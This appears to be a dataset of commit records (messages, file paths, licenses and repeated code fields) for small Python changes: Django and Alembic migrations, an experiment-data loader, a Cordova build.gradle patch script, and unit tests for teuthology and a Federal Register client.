dependencies = [
('tasks', '0006_auto_20160720_1058'),
]
operations = [
migrations.AlterField(
model_name='task',
name='type',
field=models.CharField(choices=[(b'ongoing', 'Ongoing (with deadline)'), (b'event', 'Event (on set date)')], default=b'ongoing', max_length=20, verbose_name='type'),
),
]
|
|
def303f225777894c2c03fbd0d4f42bbd647a53e
|
analysis/source.py
|
analysis/source.py
|
import climate
import codecs
import csv
import gzip
import numpy as np
import os
import pandas as pd
logging = climate.get_logger('source')
class Subject:
def __init__(self, root):
self.root = root
self.blocks = [Block(os.path.join(root, f)) for f in os.listdir(root)]
logging.info('%s: loaded subject', root)
class Block:
def __init__(self, root):
self.root = root
self.trials = [Trial(os.path.join(root, f)) for f in os.listdir(root)]
logging.info('%s: loaded block', os.path.basename(root))
class Trial:
def __init__(self, filename):
self.filename = filename
self.headers = []
self.df = None
def clear(self):
self.df = None
@property
def markers(self):
for i, h in enumerate(self.headers):
if h[:2].isdigit() and h.endswith('-x'):
yield i, h[3:-2]
def load(self):
self.df = pd.read_csv(self.filename, compression='gzip')
self.headers = self.df.columns
logging.info('%s: loaded trial %s', self.filename, self.df.shape)
if __name__ == '__main__':
climate.enable_default_logging()
import sys
s = Subject(sys.argv[1])
t = s.blocks[0].trials[0]
t.load()
for i, h in t.markers:
print(i, h)
|
Add a small starter library for experiment data.
|
Add a small starter library for experiment data.
|
Python
|
mit
|
lmjohns3/cube-experiment,lmjohns3/cube-experiment,lmjohns3/cube-experiment
|
Add a small starter library for experiment data.
|
import climate
import codecs
import csv
import gzip
import numpy as np
import os
import pandas as pd
logging = climate.get_logger('source')
class Subject:
def __init__(self, root):
self.root = root
self.blocks = [Block(os.path.join(root, f)) for f in os.listdir(root)]
logging.info('%s: loaded subject', root)
class Block:
def __init__(self, root):
self.root = root
self.trials = [Trial(os.path.join(root, f)) for f in os.listdir(root)]
logging.info('%s: loaded block', os.path.basename(root))
class Trial:
def __init__(self, filename):
self.filename = filename
self.headers = []
self.df = None
def clear(self):
self.df = None
@property
def markers(self):
for i, h in enumerate(self.headers):
if h[:2].isdigit() and h.endswith('-x'):
yield i, h[3:-2]
def load(self):
self.df = pd.read_csv(self.filename, compression='gzip')
self.headers = self.df.columns
logging.info('%s: loaded trial %s', self.filename, self.df.shape)
if __name__ == '__main__':
climate.enable_default_logging()
import sys
s = Subject(sys.argv[1])
t = s.blocks[0].trials[0]
t.load()
for i, h in t.markers:
print(i, h)
|
<commit_before><commit_msg>Add a small starter library for experiment data.<commit_after>
|
import climate
import codecs
import csv
import gzip
import numpy as np
import os
import pandas as pd
logging = climate.get_logger('source')
class Subject:
def __init__(self, root):
self.root = root
self.blocks = [Block(os.path.join(root, f)) for f in os.listdir(root)]
logging.info('%s: loaded subject', root)
class Block:
def __init__(self, root):
self.root = root
self.trials = [Trial(os.path.join(root, f)) for f in os.listdir(root)]
logging.info('%s: loaded block', os.path.basename(root))
class Trial:
def __init__(self, filename):
self.filename = filename
self.headers = []
self.df = None
def clear(self):
self.df = None
@property
def markers(self):
for i, h in enumerate(self.headers):
if h[:2].isdigit() and h.endswith('-x'):
yield i, h[3:-2]
def load(self):
self.df = pd.read_csv(self.filename, compression='gzip')
self.headers = self.df.columns
logging.info('%s: loaded trial %s', self.filename, self.df.shape)
if __name__ == '__main__':
climate.enable_default_logging()
import sys
s = Subject(sys.argv[1])
t = s.blocks[0].trials[0]
t.load()
for i, h in t.markers:
print(i, h)
|
Add a small starter library for experiment data.import climate
import codecs
import csv
import gzip
import numpy as np
import os
import pandas as pd
logging = climate.get_logger('source')
class Subject:
def __init__(self, root):
self.root = root
self.blocks = [Block(os.path.join(root, f)) for f in os.listdir(root)]
logging.info('%s: loaded subject', root)
class Block:
def __init__(self, root):
self.root = root
self.trials = [Trial(os.path.join(root, f)) for f in os.listdir(root)]
logging.info('%s: loaded block', os.path.basename(root))
class Trial:
def __init__(self, filename):
self.filename = filename
self.headers = []
self.df = None
def clear(self):
self.df = None
@property
def markers(self):
for i, h in enumerate(self.headers):
if h[:2].isdigit() and h.endswith('-x'):
yield i, h[3:-2]
def load(self):
self.df = pd.read_csv(self.filename, compression='gzip')
self.headers = self.df.columns
logging.info('%s: loaded trial %s', self.filename, self.df.shape)
if __name__ == '__main__':
climate.enable_default_logging()
import sys
s = Subject(sys.argv[1])
t = s.blocks[0].trials[0]
t.load()
for i, h in t.markers:
print(i, h)
|
<commit_before><commit_msg>Add a small starter library for experiment data.<commit_after>import climate
import codecs
import csv
import gzip
import numpy as np
import os
import pandas as pd
logging = climate.get_logger('source')
class Subject:
def __init__(self, root):
self.root = root
self.blocks = [Block(os.path.join(root, f)) for f in os.listdir(root)]
logging.info('%s: loaded subject', root)
class Block:
def __init__(self, root):
self.root = root
self.trials = [Trial(os.path.join(root, f)) for f in os.listdir(root)]
logging.info('%s: loaded block', os.path.basename(root))
class Trial:
def __init__(self, filename):
self.filename = filename
self.headers = []
self.df = None
def clear(self):
self.df = None
@property
def markers(self):
for i, h in enumerate(self.headers):
if h[:2].isdigit() and h.endswith('-x'):
yield i, h[3:-2]
def load(self):
self.df = pd.read_csv(self.filename, compression='gzip')
self.headers = self.df.columns
logging.info('%s: loaded trial %s', self.filename, self.df.shape)
if __name__ == '__main__':
climate.enable_default_logging()
import sys
s = Subject(sys.argv[1])
t = s.blocks[0].trials[0]
t.load()
for i, h in t.markers:
print(i, h)
|
|
01732bcb55cf7cd913bebcdbc6fe883e366870bb
|
bin/gradle_workaround.py
|
bin/gradle_workaround.py
|
import fileinput
import argparse
import logging
BUILD_GRADLE = "platforms/android/build.gradle"
# BUILD_GRADLE = "/tmp/build.gradle"
LINE_BEFORE = "// PLUGIN GRADLE EXTENSIONS END"
OUR_ADD_REMOVE_LINE = 'apply from: "cordova-plugin-crosswalk-webview/xwalk6-workaround.gradle"'
def add_gradle_line():
for line in fileinput.input(BUILD_GRADLE, inplace=True):
line = line.strip("\n")
print(line)
if line == LINE_BEFORE:
print(OUR_ADD_REMOVE_LINE)
def remove_gradle_line():
for line in fileinput.input(BUILD_GRADLE, inplace=True):
line = line.strip("\n")
if line == OUR_ADD_REMOVE_LINE:
pass
else:
print(line)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("-a", "--add", action="store_true",
help="add the xwalk line to build.gradle")
group.add_argument("-r", "--remove", action="store_true",
help="remove the xwalk line from build.gradle")
args = parser.parse_args()
if args.add:
add_gradle_line()
if args.remove:
remove_gradle_line()
|
Add the grade_workaround used by the crosswalk plugin
|
Add the grade_workaround used by the crosswalk plugin
This has always been used; we now finally check it in!
|
Python
|
bsd-3-clause
|
shankari/e-mission-phone,e-mission/e-mission-phone,e-mission/e-mission-phone,e-mission/e-mission-phone,e-mission/e-mission-phone,shankari/e-mission-phone,shankari/e-mission-phone,shankari/e-mission-phone
|
Add the grade_workaround used by the crosswalk plugin
This has always been used; we now finally check it in!
|
import fileinput
import argparse
import logging
BUILD_GRADLE = "platforms/android/build.gradle"
# BUILD_GRADLE = "/tmp/build.gradle"
LINE_BEFORE = "// PLUGIN GRADLE EXTENSIONS END"
OUR_ADD_REMOVE_LINE = 'apply from: "cordova-plugin-crosswalk-webview/xwalk6-workaround.gradle"'
def add_gradle_line():
for line in fileinput.input(BUILD_GRADLE, inplace=True):
line = line.strip("\n")
print(line)
if line == LINE_BEFORE:
print(OUR_ADD_REMOVE_LINE)
def remove_gradle_line():
for line in fileinput.input(BUILD_GRADLE, inplace=True):
line = line.strip("\n")
if line == OUR_ADD_REMOVE_LINE:
pass
else:
print(line)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("-a", "--add", action="store_true",
help="add the xwalk line to build.gradle")
group.add_argument("-r", "--remove", action="store_true",
help="remove the xwalk line from build.gradle")
args = parser.parse_args()
if args.add:
add_gradle_line()
if args.remove:
remove_gradle_line()
|
<commit_before><commit_msg>Add the grade_workaround used by the crosswalk plugin
This has always been used; we now finally check it in!<commit_after>
|
import fileinput
import argparse
import logging
BUILD_GRADLE = "platforms/android/build.gradle"
# BUILD_GRADLE = "/tmp/build.gradle"
LINE_BEFORE = "// PLUGIN GRADLE EXTENSIONS END"
OUR_ADD_REMOVE_LINE = 'apply from: "cordova-plugin-crosswalk-webview/xwalk6-workaround.gradle"'
def add_gradle_line():
for line in fileinput.input(BUILD_GRADLE, inplace=True):
line = line.strip("\n")
print(line)
if line == LINE_BEFORE:
print(OUR_ADD_REMOVE_LINE)
def remove_gradle_line():
for line in fileinput.input(BUILD_GRADLE, inplace=True):
line = line.strip("\n")
if line == OUR_ADD_REMOVE_LINE:
pass
else:
print(line)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("-a", "--add", action="store_true",
help="add the xwalk line to build.gradle")
group.add_argument("-r", "--remove", action="store_true",
help="remove the xwalk line from build.gradle")
args = parser.parse_args()
if args.add:
add_gradle_line()
if args.remove:
remove_gradle_line()
|
Add the grade_workaround used by the crosswalk plugin
This has always been used; we now finally check it in!import fileinput
import argparse
import logging
BUILD_GRADLE = "platforms/android/build.gradle"
# BUILD_GRADLE = "/tmp/build.gradle"
LINE_BEFORE = "// PLUGIN GRADLE EXTENSIONS END"
OUR_ADD_REMOVE_LINE = 'apply from: "cordova-plugin-crosswalk-webview/xwalk6-workaround.gradle"'
def add_gradle_line():
for line in fileinput.input(BUILD_GRADLE, inplace=True):
line = line.strip("\n")
print(line)
if line == LINE_BEFORE:
print(OUR_ADD_REMOVE_LINE)
def remove_gradle_line():
for line in fileinput.input(BUILD_GRADLE, inplace=True):
line = line.strip("\n")
if line == OUR_ADD_REMOVE_LINE:
pass
else:
print(line)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("-a", "--add", action="store_true",
help="add the xwalk line to build.gradle")
group.add_argument("-r", "--remove", action="store_true",
help="remove the xwalk line from build.gradle")
args = parser.parse_args()
if args.add:
add_gradle_line()
if args.remove:
remove_gradle_line()
|
<commit_before><commit_msg>Add the grade_workaround used by the crosswalk plugin
This has always been used; we now finally check it in!<commit_after>import fileinput
import argparse
import logging
BUILD_GRADLE = "platforms/android/build.gradle"
# BUILD_GRADLE = "/tmp/build.gradle"
LINE_BEFORE = "// PLUGIN GRADLE EXTENSIONS END"
OUR_ADD_REMOVE_LINE = 'apply from: "cordova-plugin-crosswalk-webview/xwalk6-workaround.gradle"'
def add_gradle_line():
for line in fileinput.input(BUILD_GRADLE, inplace=True):
line = line.strip("\n")
print(line)
if line == LINE_BEFORE:
print(OUR_ADD_REMOVE_LINE)
def remove_gradle_line():
for line in fileinput.input(BUILD_GRADLE, inplace=True):
line = line.strip("\n")
if line == OUR_ADD_REMOVE_LINE:
pass
else:
print(line)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument("-a", "--add", action="store_true",
help="add the xwalk line to build.gradle")
group.add_argument("-r", "--remove", action="store_true",
help="remove the xwalk line from build.gradle")
args = parser.parse_args()
if args.add:
add_gradle_line()
if args.remove:
remove_gradle_line()
|
|
a15b0746426cc0560568a462f829e4c4215a0a47
|
migrations/versions/0058.py
|
migrations/versions/0058.py
|
"""empty message
Revision ID: 0058 set all has_banner_text
Revises: 0057 add has_banner_text
Create Date: 2021-10-03 00:31:22.285217
"""
# revision identifiers, used by Alembic.
revision = '0058 set all has_banner_text'
down_revision = '0057 add has_banner_text'
from alembic import op
def upgrade():
op.execute("UPDATE events SET has_banner_text = True")
def downgrade():
pass
|
Set all events to show banner text
|
Set all events to show banner text
|
Python
|
mit
|
NewAcropolis/api,NewAcropolis/api,NewAcropolis/api
|
Set all events to show banner text
|
"""empty message
Revision ID: 0058 set all has_banner_text
Revises: 0057 add has_banner_text
Create Date: 2021-10-03 00:31:22.285217
"""
# revision identifiers, used by Alembic.
revision = '0058 set all has_banner_text'
down_revision = '0057 add has_banner_text'
from alembic import op
def upgrade():
op.execute("UPDATE events SET has_banner_text = True")
def downgrade():
pass
|
<commit_before><commit_msg>Set all events to show banner text<commit_after>
|
"""empty message
Revision ID: 0058 set all has_banner_text
Revises: 0057 add has_banner_text
Create Date: 2021-10-03 00:31:22.285217
"""
# revision identifiers, used by Alembic.
revision = '0058 set all has_banner_text'
down_revision = '0057 add has_banner_text'
from alembic import op
def upgrade():
op.execute("UPDATE events SET has_banner_text = True")
def downgrade():
pass
|
Set all events to show banner text"""empty message
Revision ID: 0058 set all has_banner_text
Revises: 0057 add has_banner_text
Create Date: 2021-10-03 00:31:22.285217
"""
# revision identifiers, used by Alembic.
revision = '0058 set all has_banner_text'
down_revision = '0057 add has_banner_text'
from alembic import op
def upgrade():
op.execute("UPDATE events SET has_banner_text = True")
def downgrade():
pass
|
<commit_before><commit_msg>Set all events to show banner text<commit_after>"""empty message
Revision ID: 0058 set all has_banner_text
Revises: 0057 add has_banner_text
Create Date: 2021-10-03 00:31:22.285217
"""
# revision identifiers, used by Alembic.
revision = '0058 set all has_banner_text'
down_revision = '0057 add has_banner_text'
from alembic import op
def upgrade():
op.execute("UPDATE events SET has_banner_text = True")
def downgrade():
pass
|
|
b6cb3f8cb7a9b11e76c1f7f4b983983d415aa3da
|
teuthology/test/test_suite.py
|
teuthology/test/test_suite.py
|
import requests
from datetime import datetime
from pytest import raises
from teuthology.config import config
from teuthology import suite
class TestSuite(object):
def test_name_timestamp_passed(self):
stamp = datetime.now().strftime('%Y-%m-%d_%H:%M:%S')
name = suite.make_name('suite', 'ceph', 'kernel', 'flavor', 'mtype',
timestamp=stamp)
assert str(stamp) in name
def test_name_timestamp_not_passed(self):
stamp = datetime.now().strftime('%Y-%m-%d_%H:%M:%S')
name = suite.make_name('suite', 'ceph', 'kernel', 'flavor', 'mtype')
assert str(stamp) in name
def test_name_user(self):
name = suite.make_name('suite', 'ceph', 'kernel', 'flavor', 'mtype',
user='USER')
assert name.startswith('USER-')
def test_ceph_hash(self):
resp = requests.get(
'https://api.github.com/repos/ceph/ceph/git/refs/heads/master')
ref_hash = resp.json()['object']['sha']
assert suite.get_hash('ceph') == ref_hash
def test_distro_defaults_saya(self):
assert suite.get_distro_defaults('ubuntu', 'saya') == ('armv7l',
'saucy', 'deb')
def test_distro_defaults_plana(self):
assert suite.get_distro_defaults('ubuntu', 'plana') == ('x86_64',
'precise',
'deb')
def test_gitbuilder_url(self):
ref_url = "http://gitbuilder.ceph.com/ceph-deb-squeeze-x86_64-basic/"
assert suite.get_gitbuilder_url('ceph', 'squeeze', 'deb', 'x86_64',
'basic') == ref_url
def test_config_bogus_kernel_branch(self):
# Don't attempt to send email
config.results_email = None
with raises(suite.ScheduleFailError):
suite.create_initial_config('s', 'c', 't', 'bogus_kernel_branch',
'f', 'd', 'm')
def test_config_bogus_kernel_flavor(self):
# Don't attempt to send email
config.results_email = None
with raises(suite.ScheduleFailError):
suite.create_initial_config('s', 'c', 't', 'k',
'bogus_kernel_flavor', 'd', 'm')
def test_config_bogus_ceph_branch(self):
# Don't attempt to send email
config.results_email = None
with raises(suite.ScheduleFailError):
suite.create_initial_config('s', 'bogus_ceph_branch', 't', 'k',
'f', 'd', 'm')
# add other tests that use create_initial_config, deserialize the yaml stream
# maybe use notario for the above?
|
Add lots of unit tests for teuthology.suite
|
Add lots of unit tests for teuthology.suite
More to come...
Signed-off-by: Zack Cerza <f801c831581d4150a2793939287636221d62131e@inktank.com>
|
Python
|
mit
|
SUSE/teuthology,tchaikov/teuthology,dmick/teuthology,robbat2/teuthology,ktdreyer/teuthology,michaelsevilla/teuthology,dreamhost/teuthology,t-miyamae/teuthology,t-miyamae/teuthology,tchaikov/teuthology,yghannam/teuthology,dreamhost/teuthology,ivotron/teuthology,zhouyuan/teuthology,yghannam/teuthology,SUSE/teuthology,zhouyuan/teuthology,caibo2014/teuthology,robbat2/teuthology,ivotron/teuthology,michaelsevilla/teuthology,dmick/teuthology,SUSE/teuthology,ktdreyer/teuthology,caibo2014/teuthology,ceph/teuthology,dmick/teuthology,ceph/teuthology
|
Add lots of unit tests for teuthology.suite
More to come...
Signed-off-by: Zack Cerza <f801c831581d4150a2793939287636221d62131e@inktank.com>
|
import requests
from datetime import datetime
from pytest import raises
from teuthology.config import config
from teuthology import suite
class TestSuite(object):
def test_name_timestamp_passed(self):
stamp = datetime.now().strftime('%Y-%m-%d_%H:%M:%S')
name = suite.make_name('suite', 'ceph', 'kernel', 'flavor', 'mtype',
timestamp=stamp)
assert str(stamp) in name
def test_name_timestamp_not_passed(self):
stamp = datetime.now().strftime('%Y-%m-%d_%H:%M:%S')
name = suite.make_name('suite', 'ceph', 'kernel', 'flavor', 'mtype')
assert str(stamp) in name
def test_name_user(self):
name = suite.make_name('suite', 'ceph', 'kernel', 'flavor', 'mtype',
user='USER')
assert name.startswith('USER-')
def test_ceph_hash(self):
resp = requests.get(
'https://api.github.com/repos/ceph/ceph/git/refs/heads/master')
ref_hash = resp.json()['object']['sha']
assert suite.get_hash('ceph') == ref_hash
def test_distro_defaults_saya(self):
assert suite.get_distro_defaults('ubuntu', 'saya') == ('armv7l',
'saucy', 'deb')
def test_distro_defaults_plana(self):
assert suite.get_distro_defaults('ubuntu', 'plana') == ('x86_64',
'precise',
'deb')
def test_gitbuilder_url(self):
ref_url = "http://gitbuilder.ceph.com/ceph-deb-squeeze-x86_64-basic/"
assert suite.get_gitbuilder_url('ceph', 'squeeze', 'deb', 'x86_64',
'basic') == ref_url
def test_config_bogus_kernel_branch(self):
# Don't attempt to send email
config.results_email = None
with raises(suite.ScheduleFailError):
suite.create_initial_config('s', 'c', 't', 'bogus_kernel_branch',
'f', 'd', 'm')
def test_config_bogus_kernel_flavor(self):
# Don't attempt to send email
config.results_email = None
with raises(suite.ScheduleFailError):
suite.create_initial_config('s', 'c', 't', 'k',
'bogus_kernel_flavor', 'd', 'm')
def test_config_bogus_ceph_branch(self):
# Don't attempt to send email
config.results_email = None
with raises(suite.ScheduleFailError):
suite.create_initial_config('s', 'bogus_ceph_branch', 't', 'k',
'f', 'd', 'm')
# add other tests that use create_initial_config, deserialize the yaml stream
# maybe use notario for the above?
|
<commit_before><commit_msg>Add lots of unit tests for teuthology.suite
More to come...
Signed-off-by: Zack Cerza <f801c831581d4150a2793939287636221d62131e@inktank.com><commit_after>
|
import requests
from datetime import datetime
from pytest import raises
from teuthology.config import config
from teuthology import suite
class TestSuite(object):
def test_name_timestamp_passed(self):
stamp = datetime.now().strftime('%Y-%m-%d_%H:%M:%S')
name = suite.make_name('suite', 'ceph', 'kernel', 'flavor', 'mtype',
timestamp=stamp)
assert str(stamp) in name
def test_name_timestamp_not_passed(self):
stamp = datetime.now().strftime('%Y-%m-%d_%H:%M:%S')
name = suite.make_name('suite', 'ceph', 'kernel', 'flavor', 'mtype')
assert str(stamp) in name
def test_name_user(self):
name = suite.make_name('suite', 'ceph', 'kernel', 'flavor', 'mtype',
user='USER')
assert name.startswith('USER-')
def test_ceph_hash(self):
resp = requests.get(
'https://api.github.com/repos/ceph/ceph/git/refs/heads/master')
ref_hash = resp.json()['object']['sha']
assert suite.get_hash('ceph') == ref_hash
def test_distro_defaults_saya(self):
assert suite.get_distro_defaults('ubuntu', 'saya') == ('armv7l',
'saucy', 'deb')
def test_distro_defaults_plana(self):
assert suite.get_distro_defaults('ubuntu', 'plana') == ('x86_64',
'precise',
'deb')
def test_gitbuilder_url(self):
ref_url = "http://gitbuilder.ceph.com/ceph-deb-squeeze-x86_64-basic/"
assert suite.get_gitbuilder_url('ceph', 'squeeze', 'deb', 'x86_64',
'basic') == ref_url
def test_config_bogus_kernel_branch(self):
# Don't attempt to send email
config.results_email = None
with raises(suite.ScheduleFailError):
suite.create_initial_config('s', 'c', 't', 'bogus_kernel_branch',
'f', 'd', 'm')
def test_config_bogus_kernel_flavor(self):
# Don't attempt to send email
config.results_email = None
with raises(suite.ScheduleFailError):
suite.create_initial_config('s', 'c', 't', 'k',
'bogus_kernel_flavor', 'd', 'm')
def test_config_bogus_ceph_branch(self):
# Don't attempt to send email
config.results_email = None
with raises(suite.ScheduleFailError):
suite.create_initial_config('s', 'bogus_ceph_branch', 't', 'k',
'f', 'd', 'm')
# add other tests that use create_initial_config, deserialize the yaml stream
# maybe use notario for the above?
|
Add lots of unit tests for teuthology.suite
More to come...
Signed-off-by: Zack Cerza <f801c831581d4150a2793939287636221d62131e@inktank.com>import requests
from datetime import datetime
from pytest import raises
from teuthology.config import config
from teuthology import suite
class TestSuite(object):
def test_name_timestamp_passed(self):
stamp = datetime.now().strftime('%Y-%m-%d_%H:%M:%S')
name = suite.make_name('suite', 'ceph', 'kernel', 'flavor', 'mtype',
timestamp=stamp)
assert str(stamp) in name
def test_name_timestamp_not_passed(self):
stamp = datetime.now().strftime('%Y-%m-%d_%H:%M:%S')
name = suite.make_name('suite', 'ceph', 'kernel', 'flavor', 'mtype')
assert str(stamp) in name
def test_name_user(self):
name = suite.make_name('suite', 'ceph', 'kernel', 'flavor', 'mtype',
user='USER')
assert name.startswith('USER-')
def test_ceph_hash(self):
resp = requests.get(
'https://api.github.com/repos/ceph/ceph/git/refs/heads/master')
ref_hash = resp.json()['object']['sha']
assert suite.get_hash('ceph') == ref_hash
def test_distro_defaults_saya(self):
assert suite.get_distro_defaults('ubuntu', 'saya') == ('armv7l',
'saucy', 'deb')
def test_distro_defaults_plana(self):
assert suite.get_distro_defaults('ubuntu', 'plana') == ('x86_64',
'precise',
'deb')
def test_gitbuilder_url(self):
ref_url = "http://gitbuilder.ceph.com/ceph-deb-squeeze-x86_64-basic/"
assert suite.get_gitbuilder_url('ceph', 'squeeze', 'deb', 'x86_64',
'basic') == ref_url
def test_config_bogus_kernel_branch(self):
# Don't attempt to send email
config.results_email = None
with raises(suite.ScheduleFailError):
suite.create_initial_config('s', 'c', 't', 'bogus_kernel_branch',
'f', 'd', 'm')
def test_config_bogus_kernel_flavor(self):
# Don't attempt to send email
config.results_email = None
with raises(suite.ScheduleFailError):
suite.create_initial_config('s', 'c', 't', 'k',
'bogus_kernel_flavor', 'd', 'm')
def test_config_bogus_ceph_branch(self):
# Don't attempt to send email
config.results_email = None
with raises(suite.ScheduleFailError):
suite.create_initial_config('s', 'bogus_ceph_branch', 't', 'k',
'f', 'd', 'm')
# add other tests that use create_initial_config, deserialize the yaml stream
# maybe use notario for the above?
|
<commit_before><commit_msg>Add lots of unit tests for teuthology.suite
More to come...
Signed-off-by: Zack Cerza <f801c831581d4150a2793939287636221d62131e@inktank.com><commit_after>import requests
from datetime import datetime
from pytest import raises
from teuthology.config import config
from teuthology import suite
class TestSuite(object):
def test_name_timestamp_passed(self):
stamp = datetime.now().strftime('%Y-%m-%d_%H:%M:%S')
name = suite.make_name('suite', 'ceph', 'kernel', 'flavor', 'mtype',
timestamp=stamp)
assert str(stamp) in name
def test_name_timestamp_not_passed(self):
stamp = datetime.now().strftime('%Y-%m-%d_%H:%M:%S')
name = suite.make_name('suite', 'ceph', 'kernel', 'flavor', 'mtype')
assert str(stamp) in name
def test_name_user(self):
name = suite.make_name('suite', 'ceph', 'kernel', 'flavor', 'mtype',
user='USER')
assert name.startswith('USER-')
def test_ceph_hash(self):
resp = requests.get(
'https://api.github.com/repos/ceph/ceph/git/refs/heads/master')
ref_hash = resp.json()['object']['sha']
assert suite.get_hash('ceph') == ref_hash
def test_distro_defaults_saya(self):
assert suite.get_distro_defaults('ubuntu', 'saya') == ('armv7l',
'saucy', 'deb')
def test_distro_defaults_plana(self):
assert suite.get_distro_defaults('ubuntu', 'plana') == ('x86_64',
'precise',
'deb')
def test_gitbuilder_url(self):
ref_url = "http://gitbuilder.ceph.com/ceph-deb-squeeze-x86_64-basic/"
assert suite.get_gitbuilder_url('ceph', 'squeeze', 'deb', 'x86_64',
'basic') == ref_url
def test_config_bogus_kernel_branch(self):
# Don't attempt to send email
config.results_email = None
with raises(suite.ScheduleFailError):
suite.create_initial_config('s', 'c', 't', 'bogus_kernel_branch',
'f', 'd', 'm')
def test_config_bogus_kernel_flavor(self):
# Don't attempt to send email
config.results_email = None
with raises(suite.ScheduleFailError):
suite.create_initial_config('s', 'c', 't', 'k',
'bogus_kernel_flavor', 'd', 'm')
def test_config_bogus_ceph_branch(self):
# Don't attempt to send email
config.results_email = None
with raises(suite.ScheduleFailError):
suite.create_initial_config('s', 'bogus_ceph_branch', 't', 'k',
'f', 'd', 'm')
# add other tests that use create_initial_config, deserialize the yaml stream
# maybe use notario for the above?
|
|
2988bc031187a21f5ff6a5c5f6af3af43dbb422c
|
rdmo/questions/migrations/0065_data_migration.py
|
rdmo/questions/migrations/0065_data_migration.py
|
from __future__ import unicode_literals
from django.db import migrations
def run_data_migration(apps, schema_editor):
Attribute = apps.get_model('domain', 'Attribute')
QuestionSet = apps.get_model('questions', 'QuestionSet')
questionsets = QuestionSet.objects.filter(is_collection=True)
for questionset in questionsets:
if questionset.attribute.key != 'id':
try:
questionset.attribute = Attribute.objects.get(parent=questionset.attribute, key='id')
questionset.save()
except Attribute.DoesNotExist:
pass
class Migration(migrations.Migration):
dependencies = [
('questions', '0064_widget_type_choices'),
]
operations = [
migrations.RunPython(run_data_migration),
]
|
Add data migration to update questionsets
|
Add data migration to update questionsets
|
Python
|
apache-2.0
|
rdmorganiser/rdmo,rdmorganiser/rdmo,rdmorganiser/rdmo
|
Add data migration to update questionsets
|
from __future__ import unicode_literals
from django.db import migrations
def run_data_migration(apps, schema_editor):
Attribute = apps.get_model('domain', 'Attribute')
QuestionSet = apps.get_model('questions', 'QuestionSet')
questionsets = QuestionSet.objects.filter(is_collection=True)
for questionset in questionsets:
if questionset.attribute.key != 'id':
try:
questionset.attribute = Attribute.objects.get(parent=questionset.attribute, key='id')
questionset.save()
except Attribute.DoesNotExist:
pass
class Migration(migrations.Migration):
dependencies = [
('questions', '0064_widget_type_choices'),
]
operations = [
migrations.RunPython(run_data_migration),
]
|
<commit_before><commit_msg>Add data migration to update questionsets<commit_after>
|
from __future__ import unicode_literals
from django.db import migrations
def run_data_migration(apps, schema_editor):
Attribute = apps.get_model('domain', 'Attribute')
QuestionSet = apps.get_model('questions', 'QuestionSet')
questionsets = QuestionSet.objects.filter(is_collection=True)
for questionset in questionsets:
if questionset.attribute.key != 'id':
try:
questionset.attribute = Attribute.objects.get(parent=questionset.attribute, key='id')
questionset.save()
except Attribute.DoesNotExist:
pass
class Migration(migrations.Migration):
dependencies = [
('questions', '0064_widget_type_choices'),
]
operations = [
migrations.RunPython(run_data_migration),
]
|
Add data migration to update questionsetsfrom __future__ import unicode_literals
from django.db import migrations
def run_data_migration(apps, schema_editor):
Attribute = apps.get_model('domain', 'Attribute')
QuestionSet = apps.get_model('questions', 'QuestionSet')
questionsets = QuestionSet.objects.filter(is_collection=True)
for questionset in questionsets:
if questionset.attribute.key != 'id':
try:
questionset.attribute = Attribute.objects.get(parent=questionset.attribute, key='id')
questionset.save()
except Attribute.DoesNotExist:
pass
class Migration(migrations.Migration):
dependencies = [
('questions', '0064_widget_type_choices'),
]
operations = [
migrations.RunPython(run_data_migration),
]
|
<commit_before><commit_msg>Add data migration to update questionsets<commit_after>from __future__ import unicode_literals
from django.db import migrations
def run_data_migration(apps, schema_editor):
Attribute = apps.get_model('domain', 'Attribute')
QuestionSet = apps.get_model('questions', 'QuestionSet')
questionsets = QuestionSet.objects.filter(is_collection=True)
for questionset in questionsets:
if questionset.attribute.key != 'id':
try:
questionset.attribute = Attribute.objects.get(parent=questionset.attribute, key='id')
questionset.save()
except Attribute.DoesNotExist:
pass
class Migration(migrations.Migration):
dependencies = [
('questions', '0064_widget_type_choices'),
]
operations = [
migrations.RunPython(run_data_migration),
]
|
|
9db3d255c396b4b785ff2f3bfa99b801824cf713
|
tests/federalregister.py
|
tests/federalregister.py
|
from mock import patch
from parser.federalregister import *
from unittest import TestCase
class FederalRegisterTest(TestCase):
@patch('parser.federalregister.urlopen')
def test_fetch_notice_xml(self, urlopen):
"""We don't actually want to call out to federal register, so we use
a mock. Unfortunately, the mock is called twice with two very
different results, so we need to have a complicated return value."""
show_xml = [False] # must use a container class
def read_response():
if show_xml[0]:
return "XML String"
else:
show_xml[0] = True
return """
<script text="javascript">
var dev_formats = {"formats":[
{"type":"xml","url":"url.xml",
"title":"Original full text XML", "name":"XML"},
{"type":"mods","url":"other_url/mods.xml",
"title":"Government Printing Office metadata",
"name":"MODS"},
{"type":"json","url":"final",
"title":"Normalized attributes and metadata",
"name":"JSON"}]};
</script>"""
urlopen.return_value.read.side_effect = read_response
self.assertEqual('XML String', fetch_notice_xml('initial-url'))
@patch('parser.federalregister.urlopen')
def test_fetch_notices(self, urlopen):
"""Fetch Notices combines data from a lot of places, so we will use
many mocks."""
with patch('parser.federalregister.fetch_notice_xml') as fetch_xml:
with patch('parser.federalregister.build_notice') as build_note:
urlopen.return_value.read.return_value = """
{"results": [{"html_url": "url1"}, {"html_url": "url2"}]}
"""
fetch_xml.return_value = '<ROOT />'
build_note.return_value = 'NOTICE!'
notices = fetch_notices(23, 1222)
self.assertTrue('23' in urlopen.call_args[0][0])
self.assertTrue('1222' in urlopen.call_args[0][0])
self.assertEqual(2, len(fetch_xml.call_args_list))
self.assertEqual('url1', fetch_xml.call_args_list[0][0][0])
self.assertEqual('url2', fetch_xml.call_args_list[1][0][0])
self.assertEqual(['NOTICE!', 'NOTICE!'], notices)
|
Add tests for federal register client
|
Add tests for federal register client
|
Python
|
cc0-1.0
|
